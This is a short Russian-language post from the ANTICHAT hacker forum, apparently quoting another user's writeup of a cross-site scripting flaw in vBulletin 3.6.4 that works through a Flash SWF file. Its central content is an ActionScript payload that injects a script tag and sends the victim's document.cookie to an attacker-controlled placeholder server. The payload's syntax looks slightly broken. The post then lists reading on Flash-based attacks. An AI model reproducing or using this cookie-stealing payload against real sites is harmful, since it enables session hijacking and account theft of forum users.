ANTICHAT - Показать сообщение отдельно - [Обзор уязвимостей vBulletin]

Было много вопросов к посту:

Цитата:

Сообщение от Mr_Necromancer

VBulletin 3.6.4

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.

Пример:

Код:

getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");

Для интересующихся как это реализуется:

Обзор работы SWF паразита
Подделка заголовков HTTP запроса с помощью Flash ActionScript
Bypassing JavaScript Filters the Flash! Attack
Cross-Domain Data Access via Flash [CDDAF] Reference
Forging HTTP Request Headers with Flash ActionScript